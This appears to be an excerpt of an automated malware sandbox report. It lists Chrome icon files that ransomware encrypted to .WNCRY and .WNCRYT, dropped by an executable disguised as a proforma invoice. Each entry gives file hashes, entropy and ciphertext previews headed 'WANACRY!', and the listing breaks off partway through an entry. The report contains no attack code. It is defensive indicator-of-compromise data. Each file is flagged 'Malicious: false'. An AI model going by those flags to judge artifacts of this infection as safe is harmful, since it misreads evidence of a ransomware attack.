                                                          Preview:WANACRY!....&*...8...P....O.p...\.\{...B;..J.....F.UQ..sY#E.^...j\Sn<.H..)H&...a!...t..n..wb.....S..5.^.4T.v.w........e..D...6..s..2......y.....dO.*L....r.z.r.Y..8.E..._^.....$yF....]].NU...7.U.I.?;N.n.=..!m.Nd...F....M.^9..K<.....|r..N...XK.&,.-.^..a....MD....g........m..V..Va./@P.e....l.|...(..DQv.......*W+.KK\GH.l.]~...uA...:{/.<U...U...f.5~....i.G.n...`......K.".........gR....1..+..........[....\.-m..@...>.Mt&&.5\w..oE'^i..oGX..s..e.B/4%...8..".Y....Ou..wD3.i(...Wo0.3`g!.........i.d.i......4.3F.]4.Z...x.k..D..2....'q...3..z7]..<....,.6........i...G.:;....gf...2em^9]..L.. .k....<.]...D.l..Em.C.P..tPV....0..y..j..p...m.l._......Q..};D....@.BxU.yJ..C....^.E....E..l..''(..Z^..0....I.,;j-j...z{p......N...=.]k......z`e.......%.QW<..=...`.B..o...#.9.j.. ..v.......Z%.I....%.fe:..*.7.g..vm...J..|..>.E_.....C....V....;.[P...P..p.w.l.wv@."..(<s...s..>.F;.d.G...{.....^....d1i...M....wc/._....%.$..o..4H....~r.dX. 2.....AG.#..OJUn".o6x1.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\256.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):12520
                                                          Entropy (8bit):7.986535132302385
                                                          Encrypted:false
                                                          SSDEEP:192:YMq228LTJaqvfjgFNQ5cPdX+1OhQ4mVZqFoi/uGE2E8DOfl+xBrgF5qhEpnyqnVd:K8hKbI1AEcDOYBrgr3yCPF
                                                          MD5:DA3379FB414CFD0C9BF3C3A0ACDBD026
                                                          SHA1:1EA7F007170A1D09FF61B42D7E9F186D257876D1
                                                          SHA-256:18285529AE75A5A59F84CF97EFC0DD7F60B255B40C412FCC5FFACD0E0B6AFB22
                                                          SHA-512:9DF960821C2A09BF4C346B9EDC6E1695A41C1CEC7842A8FB3497F06D1F2CF5A365FC1FC43ABB3CF59827C11CD139047B9DDD7D39362702A65E420BDA1887DA4A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....8.....wi.C.7...*....?..;.PZ..{.)Jj....5f....i.....fX9.OP.HX.=r...C.....'K?..b,p.i.S.w...'.(|....^...c.|..s..$......&.D..Z...4.r].K......|%.D..gu.w...g..Fs.....L..?..^.R.~....q.2lD........bVr.D..{.{N....l....6.pV=...@.....T..&.......k.H&....L`...../......dUg.t4....N..Et;G{i..........5rNT....(.P*Da.k..2......2......m..uU$b.{...f.!..6.;(..}......!.:(...S#;.h(.....H. A.U'.u.-.Q....[..e...ir.....i.T...S..}T.9q _0....37..`...jh.3.Q....1...<|.P...;^./.|.T.".$..6b.U.b.9...,V....SN#]..BG...8.^J.~."..r..2..?......3.bx....l.m....{....j.=..=7.(A...:p3f.)R..+6k..>~p.......t..M:|.v/..)P...)....=.x..R&fY..*5.g(...R......U.=B.;...l....k.t.c.$7...)...............x.]O......~~..@S.|v..r.w*.......WF.A4.Rb /...,......q.^........0.~..Nj......(=:.4.....8&\.P..g[.-ru{P..I2..Z..X6k..^....,.>.a.,.....%.ca.d!..P.l<....5.R._w.....].p.r...`....Rh......}.1a..!&..5..5...zt.~QA=.b&.......Y..M.....y...`...-...\.8W..g]c1(...N7..rL..8W.....o...x/W...5K.>."

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\256.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):12520
                                                          Entropy (8bit):7.986535132302385
                                                          Encrypted:false
                                                          SSDEEP:192:YMq228LTJaqvfjgFNQ5cPdX+1OhQ4mVZqFoi/uGE2E8DOfl+xBrgF5qhEpnyqnVd:K8hKbI1AEcDOYBrgr3yCPF
                                                          MD5:DA3379FB414CFD0C9BF3C3A0ACDBD026
                                                          SHA1:1EA7F007170A1D09FF61B42D7E9F186D257876D1
                                                          SHA-256:18285529AE75A5A59F84CF97EFC0DD7F60B255B40C412FCC5FFACD0E0B6AFB22
                                                          SHA-512:9DF960821C2A09BF4C346B9EDC6E1695A41C1CEC7842A8FB3497F06D1F2CF5A365FC1FC43ABB3CF59827C11CD139047B9DDD7D39362702A65E420BDA1887DA4A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....8.....wi.C.7...*....?..;.PZ..{.)Jj....5f....i.....fX9.OP.HX.=r...C.....'K?..b,p.i.S.w...'.(|....^...c.|..s..$......&.D..Z...4.r].K......|%.D..gu.w...g..Fs.....L..?..^.R.~....q.2lD........bVr.D..{.{N....l....6.pV=...@.....T..&.......k.H&....L`...../......dUg.t4....N..Et;G{i..........5rNT....(.P*Da.k..2......2......m..uU$b.{...f.!..6.;(..}......!.:(...S#;.h(.....H. A.U'.u.-.Q....[..e...ir.....i.T...S..}T.9q _0....37..`...jh.3.Q....1...<|.P...;^./.|.T.".$..6b.U.b.9...,V....SN#]..BG...8.^J.~."..r..2..?......3.bx....l.m....{....j.=..=7.(A...:p3f.)R..+6k..>~p.......t..M:|.v/..)P...)....=.x..R&fY..*5.g(...R......U.=B.;...l....k.t.c.$7...)...............x.]O......~~..@S.|v..r.w*.......WF.A4.Rb /...,......q.^........0.~..Nj......(=:.4.....8&\.P..g[.-ru{P..I2..Z..X6k..^....,.>.a.,.....%.ca.d!..P.l<....5.R._w.....].p.r...`....Rh......}.1a..!&..5..5...zt.~QA=.b&.......Y..M.....y...`...-...\.8W..g]c1(...N7..rL..8W.....o...x/W...5K.>."

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\32.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1848
                                                          Entropy (8bit):7.873835759356925
                                                          Encrypted:false
                                                          SSDEEP:48:bkBc1YQxYbr/wYNt49SOUNhPJU64QpGdFWr1voLn:oBI3xqWSZNxTBK
                                                          MD5:4C5F4F38CAACBF35AE8CA935CB51A0B5
                                                          SHA1:7B81F05FFDC815A764F28295EAF32DC450A51A25
                                                          SHA-256:A4DB16A701CCE05B1937980EC28853A1EB2751FD922F834025EDBC1CD9D46B70
                                                          SHA-512:3BC5DF24237B88FA123AE714A1C588BFEFD6274A68BAE88811B57EDB6F23311FB7B6E97895F515024BD4CFF78A294241A3399E0FA7F293824B0E14F7A2D3DC38
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!..........Mx..( 4V.3..ST.l.V&.d...=.{..^.h_....{..8..%.z.".ob....[..2.#...W..>....b",.i.Q*._..-......_A.-+..6|.hs.D..w.w.Xf.....k...W...?...#..d^...=[..(>...f. ..}E@....h.U..?..J....o.~...v..+.Y.rK.Sl<.B........y._.6.&p..H.w8.[.{..;.......$....f.._..................).f1..E-..i(..{...`.e..{.Z.....G.*..[.q......0..L.....#6.dy..v... ...%..e..e.x9.....`...9i..C.5.vl ..$..d..P.c%..;...v26.|2.oJU\.x+......e5r.w.$.9..1...(q.\....\.|.|b.CHc..y...s&.y..[..A..../...#Y.C91;..:P...g."D[9...m.....b..N.:....p..;.P....U.<...L.....p..l..V.]e..oMm..3+..g..yKYd.I.........5..%.8e0..wA..92...0.D.S."..YpG...........x.h..[..II..!.<."Q..Sw.#\.H{.....Mc;.,.PUq&.F...X.......'...-.....I...F..q..^\8.<..|-US.}.Q`V.P%+...:.......?......c.7.....g.uS.Q.T..*..1..z....%....Am}......;.......jql....|.`j;Q*..x..t..2.....Y..vo...cC.*...4.i|.....d..h.......pE..V....N.W].3.....r.`.x...8W....w..XF........PEc.tU.n!M,..n5....Xl.[...%..eI.Em1K3...zT..:..m+.;......j

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\32.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1848
                                                          Entropy (8bit):7.873835759356925
                                                          Encrypted:false
                                                          SSDEEP:48:bkBc1YQxYbr/wYNt49SOUNhPJU64QpGdFWr1voLn:oBI3xqWSZNxTBK
                                                          MD5:4C5F4F38CAACBF35AE8CA935CB51A0B5
                                                          SHA1:7B81F05FFDC815A764F28295EAF32DC450A51A25
                                                          SHA-256:A4DB16A701CCE05B1937980EC28853A1EB2751FD922F834025EDBC1CD9D46B70
                                                          SHA-512:3BC5DF24237B88FA123AE714A1C588BFEFD6274A68BAE88811B57EDB6F23311FB7B6E97895F515024BD4CFF78A294241A3399E0FA7F293824B0E14F7A2D3DC38
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!..........Mx..( 4V.3..ST.l.V&.d...=.{..^.h_....{..8..%.z.".ob....[..2.#...W..>....b",.i.Q*._..-......_A.-+..6|.hs.D..w.w.Xf.....k...W...?...#..d^...=[..(>...f. ..}E@....h.U..?..J....o.~...v..+.Y.rK.Sl<.B........y._.6.&p..H.w8.[.{..;.......$....f.._..................).f1..E-..i(..{...`.e..{.Z.....G.*..[.q......0..L.....#6.dy..v... ...%..e..e.x9.....`...9i..C.5.vl ..$..d..P.c%..;...v26.|2.oJU\.x+......e5r.w.$.9..1...(q.\....\.|.|b.CHc..y...s&.y..[..A..../...#Y.C91;..:P...g."D[9...m.....b..N.:....p..;.P....U.<...L.....p..l..V.]e..oMm..3+..g..yKYd.I.........5..%.8e0..wA..92...0.D.S."..YpG...........x.h..[..II..!.<."Q..Sw.#\.H{.....Mc;.,.PUq&.F...X.......'...-.....I...F..q..^\8.<..|-US.}.Q`V.P%+...:.......?......c.7.....g.uS.Q.T..*..1..z....%....Am}......;.......jql....|.`j;Q*..x..t..2.....Y..vo...cC.*...4.i|.....d..h.......pE..V....N.W].3.....r.`.x...8W....w..XF........PEc.tU.n!M,..n5....Xl.[...%..eI.Em1K3...zT..:..m+.;......j

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\48.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2664
                                                          Entropy (8bit):7.9262753688277146
                                                          Encrypted:false
                                                          SSDEEP:48:bkrRjy8fkTfnXAXVQkRSEGDY6zILxge2ABGIcHIJ9mXNmclgOk:orV2bXsQrEGDnzIilABGZi9mX4mgOk
                                                          MD5:20A18B42F47D7298BC3C48C60F6C3734
                                                          SHA1:59516D05647C22C768B65F6637C26387A33A5001
                                                          SHA-256:13552B40EE2E69FB97BB7DE3FBE305D26238E1F00A584424FDB395F9FBADB353
                                                          SHA-512:B178591E6F4466796287F49796FEEA3CDB9519601F0396E8EDD965DF486412DA10B618AB1A3982504FD2E3E473990FB4C3EE605C8F63E8E90520963E402D530A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....g.]k;\..R.&aT. }._n..C.s.....a..&...4i.=...U.....d....J.......@.N?"......./...={d".?.]d......;.R....a...).......x..O..kg.M'..Rk..K.f^+........Vdu.cQj......[...z.^-.XT......;.if..Z.@..7.0|..E..S..=.s...,.............!k..5d..2.`...,t!K\...U.T\....M.......0<..;..x.............[....N.Y>.7.3f...A..\k.....F.U.9.......T ..n...4.AX%{.L3..k....xG...L._T..C...../!R..p.P;;..Xd..N'.>.M.z....6qS.FJq.).Z0kO].Y..~.3.j.wC.^.wNGd../.=8d..b.5.......a..?....B.T..pi....n..h.4..... ..S.......B..........%4.o..[k..H....z.x...(..'.`....7..6_M.W...r.....c.tY..Q..^..W.\.x.........K..G..M,..rA.....~.xq'...+./.?.r...f.8..l..Q.B....Hu.$N.`.i...h+...........x.W.OrC..Y.(r...O........W.....,......}T+..N....2...".J3)..ui....A............4.Q8..S....N.c..{wN?.%...+x2eG..U'.P.."'Yq".<....z{...y,.G/.Q..Q..D.P'..'.........D..(K.~.... %.....N.7T.oY' .%...s..(.G\.{tX.#Z..C.^..@.nM...,..W..C/....F=.E....p..}........;a.....`z...I.3Q0..I.=..F....u1.m\...

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\48.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2664
                                                          Entropy (8bit):7.9262753688277146
                                                          Encrypted:false
                                                          SSDEEP:48:bkrRjy8fkTfnXAXVQkRSEGDY6zILxge2ABGIcHIJ9mXNmclgOk:orV2bXsQrEGDnzIilABGZi9mX4mgOk
                                                          MD5:20A18B42F47D7298BC3C48C60F6C3734
                                                          SHA1:59516D05647C22C768B65F6637C26387A33A5001
                                                          SHA-256:13552B40EE2E69FB97BB7DE3FBE305D26238E1F00A584424FDB395F9FBADB353
                                                          SHA-512:B178591E6F4466796287F49796FEEA3CDB9519601F0396E8EDD965DF486412DA10B618AB1A3982504FD2E3E473990FB4C3EE605C8F63E8E90520963E402D530A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....g.]k;\..R.&aT. }._n..C.s.....a..&...4i.=...U.....d....J.......@.N?"......./...={d".?.]d......;.R....a...).......x..O..kg.M'..Rk..K.f^+........Vdu.cQj......[...z.^-.XT......;.if..Z.@..7.0|..E..S..=.s...,.............!k..5d..2.`...,t!K\...U.T\....M.......0<..;..x.............[....N.Y>.7.3f...A..\k.....F.U.9.......T ..n...4.AX%{.L3..k....xG...L._T..C...../!R..p.P;;..Xd..N'.>.M.z....6qS.FJq.).Z0kO].Y..~.3.j.wC.^.wNGd../.=8d..b.5.......a..?....B.T..pi....n..h.4..... ..S.......B..........%4.o..[k..H....z.x...(..'.`....7..6_M.W...r.....c.tY..Q..^..W.\.x.........K..G..M,..rA.....~.xq'...+./.?.r...f.8..l..Q.B....Hu.$N.`.i...h+...........x.W.OrC..Y.(r...O........W.....,......}T+..N....2...".J3)..ui....A............4.Q8..S....N.c..{wN?.%...+x2eG..U'.P.."'Yq".<....z{...y,.G/.Q..Q..D.P'..'.........D..(K.~.... %.....N.7T.oY' .%...s..(.G\.{tX.#Z..C.^..@.nM...,..W..C/....F=.E....p..}........;a.....`z...I.3Q0..I.=..F....u1.m\...

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\64.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3288
                                                          Entropy (8bit):7.948625850131873
                                                          Encrypted:false
                                                          SSDEEP:96:oZ63URncd90uyjELMofMDeUgbdXmIReP8dwFxnH1BDy1:93qncd98EHMD4ZmIRG8aRDD4
                                                          MD5:FEDEFA76EE02A5E3DB53C1E55C0069B0
                                                          SHA1:A2DD93BEFCCBC47D7B534BABCF6BE774ACFC157D
                                                          SHA-256:EB892C773F4E49288BF2BB95E5C249CB4C58B47328A67E225D73805ADBCB3220
                                                          SHA-512:837FB43EFB5E1B3440C25582937F5893ED5EE33A802A4A1F7DAE7EFC614EDA15D234B00970611540341F665741A370513C7D6D773FF163FCE1702DF486964145
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......|..d..Q.>C...\..x.%......s..$.4../.... ...egy...z].u#9.$..(..F...RG.RV..u..g.....e5.e.9...@~..........>dtH...F.;}.g..,..E.}f.....S.....L.7EJ.....$..h.f...J......d..K..],]{0...SX...1x.....g...G...F2...D.5.~.([.....^j.a.t..n.3..d.~.if..fTsp..B............PV..>`.0O.<.tZ.......&.<{..|...L.kMI.V._{.Z.j......hL....?....U0.\..'1=l:@.....P.[Y..8Yk........r.)Ok...J.2c$ur.....y..P`.b1...R.........<y...rZ..f..Esk......#F).SUi......<n>........9..B.-`B..n.....w....o...C...>.Q..G9.....X.o..t...j.......u.._......./4.@..R.N{.i...Y!..5...%M3f.F_.Flxi...YLdM..(y...K.JW.....X^5.y.~.\..x.M..y3f.wU.#K..1..\...Y.1g.'...m.d.......2.}.7kh.a..Si.j.."4...!=t..<...X..(.Vl..g..x.....A.....&._..D._.S.5.#..A....QHW..1Zj..s...4B#....Z.K...1u.X...iBc....f..?~.[..z=E......@a.JtWMC.L.>.M. .K.,..Q.-...N..K(...kft..(.2..Nu?..@...)`L.Nc..Bh.......F.V...R......>b..+[._zn..W+.}N.xF..F.1..f..C.M......G...<.X.|"...U........y.`L.....$\.MN[#..]....3e....j..R

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\64.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3288
                                                          Entropy (8bit):7.948625850131873
                                                          Encrypted:false
                                                          SSDEEP:96:oZ63URncd90uyjELMofMDeUgbdXmIReP8dwFxnH1BDy1:93qncd98EHMD4ZmIRG8aRDD4
                                                          MD5:FEDEFA76EE02A5E3DB53C1E55C0069B0
                                                          SHA1:A2DD93BEFCCBC47D7B534BABCF6BE774ACFC157D
                                                          SHA-256:EB892C773F4E49288BF2BB95E5C249CB4C58B47328A67E225D73805ADBCB3220
                                                          SHA-512:837FB43EFB5E1B3440C25582937F5893ED5EE33A802A4A1F7DAE7EFC614EDA15D234B00970611540341F665741A370513C7D6D773FF163FCE1702DF486964145
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......|..d..Q.>C...\..x.%......s..$.4../.... ...egy...z].u#9.$..(..F...RG.RV..u..g.....e5.e.9...@~..........>dtH...F.;}.g..,..E.}f.....S.....L.7EJ.....$..h.f...J......d..K..],]{0...SX...1x.....g...G...F2...D.5.~.([.....^j.a.t..n.3..d.~.if..fTsp..B............PV..>`.0O.<.tZ.......&.<{..|...L.kMI.V._{.Z.j......hL....?....U0.\..'1=l:@.....P.[Y..8Yk........r.)Ok...J.2c$ur.....y..P`.b1...R.........<y...rZ..f..Esk......#F).SUi......<n>........9..B.-`B..n.....w....o...C...>.Q..G9.....X.o..t...j.......u.._......./4.@..R.N{.i...Y!..5...%M3f.F_.Flxi...YLdM..(y...K.JW.....X^5.y.~.\..x.M..y3f.wU.#K..1..\...Y.1g.'...m.d.......2.}.7kh.a..Si.j.."4...!=t..<...X..(.Vl..g..x.....A.....&._..D._.S.5.#..A....QHW..1Zj..s...4B#....Z.K...1u.X...iBc....f..?~.[..z=E......@a.JtWMC.L.>.M. .K.,..Q.-...N..K(...kft..(.2..Nu?..@...)`L.Nc..Bh.......F.V...R......>b..+[._zn..W+.}N.xF..F.1..f..C.M......G...<.X.|"...U........y.`L.....$\.MN[#..]....3e....j..R

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\96.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4136
                                                          Entropy (8bit):7.954667143097365
                                                          Encrypted:false
                                                          SSDEEP:96:o/NjNProriT/ufGdia647dvJha7qQk0wNkJ+9u:i5o8/ufGdfr7dBh+qCwGJ+9u
                                                          MD5:25C0123CB3637E2E2B803BF648FE71B4
                                                          SHA1:39665D7356A75B40A47E7D26297A4784EDCBD06D
                                                          SHA-256:666DEF5F273EC4D20614C293B3BEE6AC0BDF7EE4B6E5D5B70820622936F3019F
                                                          SHA-512:ACD5A840D57A3BDD208DCF75B83EA15899C66C3797E788E3990B4DA922B92F698A69CBECAC67DB9947589BD838D7CCEC463FB9275F2A264DD67670AFE7F5BC61
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....9.....N.7.*.wM...)q.3M..HkD..5.MxK....}.)........&...7(u.!.TX.>v..Kp>.:.....1...G.B.,?2.B...~u..V.=.}../....?.zx..g.5.|.m.Q_.n.....fge.C.0..].&R@.M6,d....^.....h7Q....W.......'.Ghx/..2.5.?fH..5.YP...v./...DQ1.^,c..F...#.../....3`....=..D....)..B............Y..Mg.Nyb..)...1!dk.4...........k..../J?.Fa..*....p......l....l......W0.Y.P-.x.a!3..6..Kb...a.......[....~T..V.m.... ...E9"\..\<!Y.X...7.\#..T9..}Z...g....h.*....LR....v.l...u.5"..f....|.............6..e2.K0.!>.u..h.J...:..I*..6{..B^............5m...Z..E@.....O..V...H.O...Gq.`.5G...xa....T|.l.P5...b.R.&...4q..5n.M..r...V$R..+..F.R.\../?~'".;..>AY..x...}8.?... ...*..S...5!J...g...k6...LH....\K`gl.@U.........e...J...C..Ir..[.f.x.&.3?........j.....Ii...C<..8.H.....\..._._.]...h..m..=7l.!.bO........t.p.~..vU.s.\..G..S......sv.H.l79ZK..[5..<...C.{J%...1...Y..K.3.k..ZG.|.....y...Y.i.._..Qh......[H.yW.w#..sB.ulK...Y......W.....+G.M)...Bd..2q"..........I.c?_&.G..C.t..:.&Ea.$d..sG%M......

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\96.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4136
                                                          Entropy (8bit):7.954667143097365
                                                          Encrypted:false
                                                          SSDEEP:96:o/NjNProriT/ufGdia647dvJha7qQk0wNkJ+9u:i5o8/ufGdfr7dBh+qCwGJ+9u
                                                          MD5:25C0123CB3637E2E2B803BF648FE71B4
                                                          SHA1:39665D7356A75B40A47E7D26297A4784EDCBD06D
                                                          SHA-256:666DEF5F273EC4D20614C293B3BEE6AC0BDF7EE4B6E5D5B70820622936F3019F
                                                          SHA-512:ACD5A840D57A3BDD208DCF75B83EA15899C66C3797E788E3990B4DA922B92F698A69CBECAC67DB9947589BD838D7CCEC463FB9275F2A264DD67670AFE7F5BC61
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....9.....N.7.*.wM...)q.3M..HkD..5.MxK....}.)........&...7(u.!.TX.>v..Kp>.:.....1...G.B.,?2.B...~u..V.=.}../....?.zx..g.5.|.m.Q_.n.....fge.C.0..].&R@.M6,d....^.....h7Q....W.......'.Ghx/..2.5.?fH..5.YP...v./...DQ1.^,c..F...#.../....3`....=..D....)..B............Y..Mg.Nyb..)...1!dk.4...........k..../J?.Fa..*....p......l....l......W0.Y.P-.x.a!3..6..Kb...a.......[....~T..V.m.... ...E9"\..\<!Y.X...7.\#..T9..}Z...g....h.*....LR....v.l...u.5"..f....|.............6..e2.K0.!>.u..h.J...:..I*..6{..B^............5m...Z..E@.....O..V...H.O...Gq.`.5G...xa....T|.l.P5...b.R.&...4q..5n.M..r...V$R..+..F.R.\../?~'".;..>AY..x...}8.?... ...*..S...5!J...g...k6...LH....\K`gl.@U.........e...J...C..Ir..[.f.x.&.3?........j.....Ii...C<..8.H.....\..._._.]...h..m..=7l.!.bO........t.p.~..vU.s.\..G..S......sv.H.l79ZK..[5..<...C.{J%...1...Y..K.3.k..ZG.|.....y...Y.i.._..Qh......[H.yW.w#..sB.ulK...Y......W.....+G.M)...Bd..2q"..........I.c?_&.G..C.t..:.&Ea.$d..sG%M......

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\128.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2216
                                                          Entropy (8bit):7.901402492411875
                                                          Encrypted:false
                                                          SSDEEP:48:bkoxXJbL5l/cylqnpKV/s78l14Lex8NswutESfKm:ooxhdl/joEl1Nxc3zm
                                                          MD5:CB48C3D29612D9CBC368D82740A8235F
                                                          SHA1:7C108F97D8E2AA066957F078B8C00DA42306AB7E
                                                          SHA-256:1A8C55C302667FFFE7A724B3B55364B79BF2AA0D72DB6B22928425CC20F9AB9D
                                                          SHA-512:646920F8F0268A7F2F4CE46BB95EE483B4C3D32F666FB832535E8ED737F9053C76F6EDB0458FA99C2A20221A6E57815F301CCEDDA5907BEF0D91518D53D7B79E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........'\..|[ku.C..VH.......J.../..I(...{K..P....4o.4.i.Fd.>....`<..G.\.$f....... .k..>....P.S..:'.$..X.H}-M|S#.Q.._..J..rO.....".Xh...>...p8.`....}.t.....u.....$..5.r...W..k.&b)..|x9.*i.S..~V%%.l.q.5...J........ba.\.Xw.&.T...p.)..o.W.IQ....?............?.........=..8.\b...uX......`R6...3..,..Af...Bv>...2.. 2..._>f...a....}...._G....J...hva......5X..r.......u\....9....!.....J.{*......5.$.|r]U.Hz.^.ha.$:(...pJ.i".....c.L_].suk?..a..,.K...M.Dg....q~.6<.........HS.U.....z...b2.TaB....bGL..Z..Y,6.+...$.}..i.c..........;).^.Y..c.v/H........T.7.$...._&s...+.....K..k ..l...E.JK...}H.4<..r....z.Yu..~...i. .......A..cR...{K.H+!...s-q.~PD....-.."..d...........MX.EW...Y.n...^/.xo...k.Z...HGx........INYa..........d....d.. .-...zE.....R..M....b.T.X.xa.S.I"t$.....#.\....8U~.,.['.[\..."....Z..vA.....AY.8..]..+..Ip..k..g.H.S.d..>.......i...A.....#....X3.]m..y.......B8..f...!^......~..:... ...g..}...W.i.u.X....!.Y..bs..2J...(.V+...l...b.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\128.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2216
                                                          Entropy (8bit):7.901402492411875
                                                          Encrypted:false
                                                          SSDEEP:48:bkoxXJbL5l/cylqnpKV/s78l14Lex8NswutESfKm:ooxhdl/joEl1Nxc3zm
                                                          MD5:CB48C3D29612D9CBC368D82740A8235F
                                                          SHA1:7C108F97D8E2AA066957F078B8C00DA42306AB7E
                                                          SHA-256:1A8C55C302667FFFE7A724B3B55364B79BF2AA0D72DB6B22928425CC20F9AB9D
                                                          SHA-512:646920F8F0268A7F2F4CE46BB95EE483B4C3D32F666FB832535E8ED737F9053C76F6EDB0458FA99C2A20221A6E57815F301CCEDDA5907BEF0D91518D53D7B79E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........'\..|[ku.C..VH.......J.../..I(...{K..P....4o.4.i.Fd.>....`<..G.\.$f....... .k..>....P.S..:'.$..X.H}-M|S#.Q.._..J..rO.....".Xh...>...p8.`....}.t.....u.....$..5.r...W..k.&b)..|x9.*i.S..~V%%.l.q.5...J........ba.\.Xw.&.T...p.)..o.W.IQ....?............?.........=..8.\b...uX......`R6...3..,..Af...Bv>...2.. 2..._>f...a....}...._G....J...hva......5X..r.......u\....9....!.....J.{*......5.$.|r]U.Hz.^.ha.$:(...pJ.i".....c.L_].suk?..a..,.K...M.Dg....q~.6<.........HS.U.....z...b2.TaB....bGL..Z..Y,6.+...$.}..i.c..........;).^.Y..c.v/H........T.7.$...._&s...+.....K..k ..l...E.JK...}H.4<..r....z.Yu..~...i. .......A..cR...{K.H+!...s-q.~PD....-.."..d...........MX.EW...Y.n...^/.xo...k.Z...HGx........INYa..........d....d.. .-...zE.....R..M....b.T.X.xa.S.I"t$.....#.\....8U~.,.['.[\..."....Z..vA.....AY.8..]..+..Ip..k..g.H.S.d..>.......i...A.....#....X3.]m..y.......B8..f...!^......~..:... ...g..}...W.i.u.X....!.Y..bs..2J...(.V+...l...b.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\192.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1496
                                                          Entropy (8bit):7.861262427769727
                                                          Encrypted:false
                                                          SSDEEP:24:bkv8xFtrshRhoBr1XRamtSjXLaqcdLxL0QKyKpm+B7jVCTJ20zSshm14G8jLqA:bkGYhHChRtSjGFLx4Q5+BvkTnzpEatyA
                                                          MD5:8ECADC41F36F91E232FA2E2F3C2D1DAD
                                                          SHA1:26621E8BD125F716058748A702F69C20B6A40F90
